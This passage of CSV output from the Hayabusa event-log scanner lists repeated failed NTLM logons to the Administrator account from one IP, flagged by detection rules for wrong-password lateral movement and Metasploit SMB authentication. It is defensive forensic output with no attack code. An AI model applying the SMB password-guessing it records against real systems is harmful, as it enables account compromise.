Password,User: Administrator : Type: 3 : Workstation: Fwwp5CD20dR8QrIo : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:39.288 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:39.329 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: tL6GzVzndZL7DZMN : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:39.329 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:39.371 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: zK5IpESvDA2DexwL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:39.371 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:39.404 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: qvTyabCyGaxscOrN : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:39.404 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:39.437 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: FW8VghddPwP5C6dO : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:39.437 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:39.476 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: xGZuyZ0LErZ3Sgty : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:39.476 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:39.515 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: bT1xrvfndr5R8Vg3 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:39.515 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:39.560 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: H6RFTZVJE9remzqs : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:39.560 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:39.599 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: pzjwzORvTwuBPLEs : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:39.599 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:39.644 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: UMjSFfZ88BV2sT1F : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:39.644 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:39.681 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: SnpCLI2EJZRhr3vz : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:39.681 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:39.724 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ztEU2m9SwbqgSdVY : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:39.724 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:39.760 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MHO1X0zwmoWotcM4 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:39.760 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:39.796 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Ck429g2Cs4siVVq4 : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:39.796 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:39.835 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 9txH9zA3oY885iTi : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:39.835 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:39.876 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: alIIEzE2rTrNtOtr : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:39.876 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:39.921 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Ww4BXLwhaNxOttgo : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:39.921 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:39.977 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: GPdz2pjDocMWqctT : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:39.977 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:40.016 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: QOm1i2a20IDNmIu4 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:40.016 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:40.056 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ukSrSu516dHlHQ94 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:40.056 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:40.088 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: grdERCipFl1FMB1o : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:40.088 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:40.129 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MmpuUsIRbp57KCRD : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:40.129 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:40.168 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: VWLuqrOQSQuqcwUr : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:40.168 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:40.212 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: eEASOf84AX8ow4vf : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:40.212 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:40.254 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: IcgNTGlESh6FytEY : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:40.254 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:40.302 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: OeVo7D3oBsdUMHfj : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:40.302 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:40.348 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: mLqSB2yGMksaBgUS : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:40.348 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:40.396 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: y7qRzzpL2YhfIGSD : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:40.396 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:40.437 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: VvE5tMw3MjDhA0Fe : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:40.437 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:40.488 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: aXuNgOkIzvKIuJki : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:40.488 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:40.528 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: q8vPHEXrxVpUyKZq : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:40.528 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:40.581 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Vk7sh6VM7AZQv2in : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:40.581 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:40.627 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: jurt5hAg90y1VWdT : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:40.627 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:40.660 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MlrPbTbJRTxFakiv : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:40.660 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:40.700 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: RQ5cWmYL8weCCRT0 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:40.700 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:40.742 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: k0v2Emgn7BD1STZl : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:40.742 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:40.795 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MJppWxAiNJ4D0s2U : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:40.795 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:40.853 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: zHVcJEec3y6v9gIo : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:40.853 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:40.918 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 68RKE5dS8X5Px2gR : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:40.918 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:41.010 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Np8mTqhr7QasXk1e : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:41.010 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:41.065 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: MhpDNDIPVyRlfej8 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:41.065 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:41.118 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: qZtmxGeLj25VSUcm : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:41.118 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:41.166 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: SPN8w8WghBYzChZc : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:41.166 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:41.205 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 36hmbCuKxF9Dt4vR : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:41.205 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:41.248 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: TALpRirdvB9a8y6M : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:41.248 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:41.292 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: wvEvwFeXGOgycZvA : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:41.292 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:41.328 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5ppxeOgZNua2Ieuc : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:41.328 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
